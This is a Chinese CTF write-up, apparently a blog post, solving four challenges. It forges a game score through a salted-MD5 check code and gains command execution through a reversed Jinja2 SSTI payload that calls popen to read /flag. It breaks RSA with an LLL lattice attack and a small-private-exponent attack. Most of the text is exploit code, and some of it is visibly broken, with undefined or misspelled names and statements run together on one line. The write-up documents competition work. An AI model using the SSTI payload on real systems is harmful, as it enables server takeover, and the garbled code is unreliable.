本文已参与「新人创作礼」活动,一起开启掘金创作之路。
dino3d
这个题目考察js逆向 死亡的时候可以看到,他给check.php发送了一个分数和一个checkcode和tm三个参数 再用F12看到启动器名为sn
全局搜素sn 发现了代码
body:"score=" + parseInt(e).tostring() + "&checkCode" + md5(parseInt(e).tostring() + t) + "&tm=" + (+new Date).tostring().substring(0,10)
可以看到checkcode是分数加盐md5,然后全局搜索salt。
得到 t 为DASxCBCTF_wElc03e`
exp 如下:
import requests
from hashlib import md5
import time
url = 'http://node4.buuoj.cn:25475/check.php'
score = '10000'
salt = "DASxCBCTF_wElc03e"
checkCode=md5((score+salt).encode()).hexdigest()
tm = str(time.time())[0:10]
data= {
'score' : score,
'checkCode' : checkcode,
'tm' : tm
}
result = request.post(url=url,data=data)
print(result.text)
Text Reverse
输入{ {{ 发现被禁用
咱们输入测试函数 {if 1=1%} {%print 123%} {%endif%} 翻转后 }fidne%{}%321 tnirp%{ }%1=1 fi{
exp
import requests
url = "http://78fa350f-64ea-4d0b-a24b-4e64be049006.node4.buuoj.cn:81/?path=cat /flag"
payload = "{% for i in ''.__class__.__mro__[1].__subclasses__() %}{% if i.__name__=='_wrap_close' %}{% print i.__init__.__globals__['popen'](request.args.path).read() %}{% endif %}{% endfor %}"
data = {"text": payload[::-1]}
req = requests.post(url=url, data=data)
print(req.text)
LittleRSA
import gmpy2, libnum
e = 65537
N = 19351301035801508116955552063316327463227928638319284082504070745230119792307421099534903837766317639913937954784857576991401214861067471772614753337821871108189780331081099041824669243928056765115068764246765680962348646383991303828426125303844394268682191775232611288039200316595279055408827296256289143602827525373267536643865729646353071637054367702218515803980122435811129935450486950137279824491461041391572264371799797200331838690523349105589985032730668315787318829244743317257793753147209875458127340875400367081865762286565978620979196410411241442894450955280237513249393612603560410291825805553536595543937
g = 101172011079013273946711882340439823149055809449035744718659818796135714101721641190114954130041477714466321498903210220694435354795744225843314447645623337668697058127975104586375292636080114347294697007231487782548846095107329445479367324424672776003899748234353857872627585595343736452088156885081907758727085723312506489549364721644636251780350312413098132506051531311685636921117457469745637347738336829350634994271419554741425590636953154753970902976959308323838617091060754826727417688836026597614894745348808019654100196615719730109909578899299246848916182034705259206906552769087038179288139086772719994577168184701096922291610523676039127012518100023765548552210944426749474888311751069936144583375194023227887848704267587915237057432609663328145608194550736074250822416779448467084842127165553649513397606464059847361880649213934069715996589751778384513724306521043255299443480482640183740131563318058454711913397533436985618182923646192481486120942073719321372236539019107909910597047133371708017755744495134116771999521953654596632221519266339372439452558083199640035069852530373510758859460350025736629801086757717838159774542506755335660607766677992105601518694405113552321342152041808586187181800679845672788746273313
n = 90106928919727272173474070618911951313216606598108495724382284361415375454490594410306345748069424740100772955015304592942129026096113424198209327375124576666577469761124470792842854884924199449996929134613382626394351988541980388358156143332979538058465890179760337315789398915560641465656968797050755849799
c = 51609249982849856103564442566936515708380814106997783395400669324617748952940831076546581735494963467680719842859574144530848473300102236821201997786375946601413660428461473204032985053128283751860315027843200214217715401391736262811016964783589439740884991543059175666298728428567481043422497862838127903980
v1 = vector(ZZ, [1, g%N])
v2 = vector(ZZ, [0, N])
m = matrix([v1,v2]);
shortest_vector = m.LLL()[0]
s, p = shortest_vector
p = int(abs(p))
q = n//p
phi = (p-1)*(q-1)
d = int(gmpy2.invert(e, phi))
m = int(pow(c,d,n))
print(libnum.n2s(m))
# b'CBCTF{L4ttic3_15_6ood_i5n7_it?}'
# DASCTF{L4ttic3_15_6ood_i5n7_it?}
easyRSA
import logging
import os
import sys
from sage.all import RR
from sage.all import ZZ
path = os.path.dirname(os.path.dirname(os.path.dirname(os.path.realpath(os.path.abspat h(__file__)))))
if sys.path[1] != path:
sys.path.insert(1, path)
from attacks.factorization import known_phi
from shared.small_roots import herrmann_may
def attack(N, e, factor_bit_length, partial_p=None, delta=0.25, m=1, t=None):
"""
Recovers the prime factors if the private exponent is too small.
This implementation exploits knowledge of least significant bits of prime factors, if available.
More information: Boneh D., Durfee G., "Cryptanalysis of RSA with Private Key d Less than N^0.292"
:param N: the modulus :param e: the public exponent
:param factor_bit_length: the bit length of the prime factors
:param partial_p: the partial prime factor p (PartialInteger) (default: None)
:param delta: a predicted bound on the private exponent (d < N^delta) (default: 0.25)
:param m: the m value to use for the small roots method (default: 1) :param t: the t value to use for the small roots method (default: automatically computed using m)
:return: a tuple containing the prime factors
"""
# Use additional information about factors to speed up Boneh-Durfee. p_lsb, p_lsb_bit_length = (0, 0) if partial_p is None else partial_p.get_known_lsb()
q_lsb = (pow(p_lsb, -1, 2 ** p_lsb_bit_length) * N) % (2 ** p_lsb_bit_length)
A = ((N >> p_lsb_bit_length) + pow(2, -p_lsb_bit_length, e) * (p_lsb * q_lsb - p_lsb - q_lsb + 1))
x, y = ZZ["x", "y"].gens()
f = x * (A + y) + pow(2, -p_lsb_bit_length, e)
X = int(RR(e) ** delta)
Y = int(2 ** (factor_bit_length - p_lsb_bit_length + 1))
t = int((1 - 2 * delta) * m) if t is None else t
logging.info(f"Trying m = {m}, t = {t}...")
for x0, y0 in herrmann_may.modular_bivariate(f, e, m, t, X, Y):
z = int(f(x0, y0))
if z % e == 0:
k = pow(x0, -1, e)
s = (N + 1 + k) % e
phi = N - s + 1
factors = known_phi.factorize(N, phi)
if factors:
return factors
return None
def attack_multi_prime(N, e, factor_bit_length, factors, delta=1/6, m=5, t=None):
"""
Recovers the prime factors if the private exponent is too small.
This method works for a modulus consisting of any number of primes. :param N: the modulus :param e: the public exponent :param factor_bit_length: the bit length of the prime factors
:param factors: the number of prime factors in the modulus :param delta: a predicted bound on the private exponent (d < n^delta) (default: 0.25) :param m: the m value to use for the small roots method (default: 1) :param t: the t value to use for the small roots method (default: automatically computed using m)
:return: a tuple containing the prime factors
"""
x, y = ZZ["x", "y"].gens()
A = N + 1 f = x * (A + y) + 1 X = int(RR(e) ** delta)
Y = int(2 ** ((factors - 1) * factor_bit_length + 1))
t = int((1 - 2 * delta) * m) if t is None else t
logging.info(f"Trying m = {m}, t = {t}...")
for x0, y0 in herrmann_may.modular_bivariate(f, e, m, t, X, Y):
z = int(f(x0, y0))
if z % e == 0:
k = pow(x0, -1, e)
s = (N + 1 + k) % e
phi = N - s + 1
factors = known_phi.factorize_multi_prime(N, phi)
if factors:
return factors return None
e = 543692319895782434793586873362429927694979810701836714789970907812484502410531778466160541800747280593649956771388714635910591027174563094783670038038010184716677689452322851994224499684261265932205144517234930255520680863639225944193081925826378155392210125821339725503707170148367775432197885080200905199759978521133059068268880934032358791127722994561887633750878103807550657534488433148655178897962564751738161286704558463757099712005140968975623690058829135
n = 836627566032090527121140632018409744681773229395209292887236112065366141357802504651617810307617423900626216577416313395633967979093729729146808472187283672097414226162248255028374822667730942095319401316780150886857701380015637144123656111055773881542557503200322153966380830297951374202391216434278247679934469711771381749572937777892991364186158273504206025260342916835148914378411684678800808038832601224951586507845486535271925600310647409016210737881912119 print(attack_multi_prime(N=n, e=e, factor_bit_length=512, factors=3,delta=1/6))
output
4 (8797181922083591525585598869778503913911997539940378974707325958639527396727451469978814090844870889686771335713527050632475553144695699501624604807330289,8290840099942727456254459708872784923244718841885065356132486986630137149224154742611300270542946268526451359437629221431798319201519042426698311504716563,11470703595496691682834062401356411311733643785413826934230200844281391022097179984487180779673049269503772546339618911735119713801193135911392977437628317)
rsa 解密
import gmpy2
import libnum
c = 262857004135341325365954795119195630698138090729973647118817900621693212191529885499646534515610526918027363734446577563494752228693708806585707918542489830672358210151020370518277425565514835701391091303404848540885538503732425887366285924392127448359616405690101810030200914619945580943356783421516140571033192987307744023953015589089516394737132984255621681367783910322351237287242642322145388520883300325056201966188529192590458358240120864932085960411656176
e = 543692319895782434793586873362429927694979810701836714789970907812484502410531778466160541800747280593649956771388714635910591027174563094783670038038010184716677689452322851994224499684261265932205144517234930255520680863639225944193081925826378155392210125821339725503707170148367775432197885080200905199759978521133059068268880934032358791127722994561887633750878103807550657534488433148655178897962564751738161286704558463757099712005140968975623690058829135
n = 836627566032090527121140632018409744681773229395209292887236112065366141357802504651617810307617423900626216577416313395633967979093729729146808472187283672097414226162248255028374822667730942095319401316780150886857701380015637144123656111055773881542557503200322153966380830297951374202391216434278247679934469711771381749572937777892991364186158273504206025260342916835148914378411684678800808038832601224951586507845486535271925600310647409016210737881912119
p,q,r = (8797181922083591525585598869778503913911997539940378974707325958639527396727451469978814090844870889686771335713527050632475553144695699501624604807330289,8290840099942727456254459708872784923244718841885065356132486986630137149224154742611300270542946268526451359437629221431798319201519042426698311504716563,11470703595496691682834062401356411311733643785413826934230200844281391022097179984487180779673049269503772546339618911735119713801193135911392977437628317)
phi = (p-1)*(q-1)*(r-1) d = int(gmpy2.invert(e, phi))
m = int(pow(c,d,n)) print(libnum.n2s(m)) # b'CBCTF{W13ner_4ttack_ca^_d0_m0r3!}' # DASCTF{W13ner_4ttack_ca^_d0_m0r3!
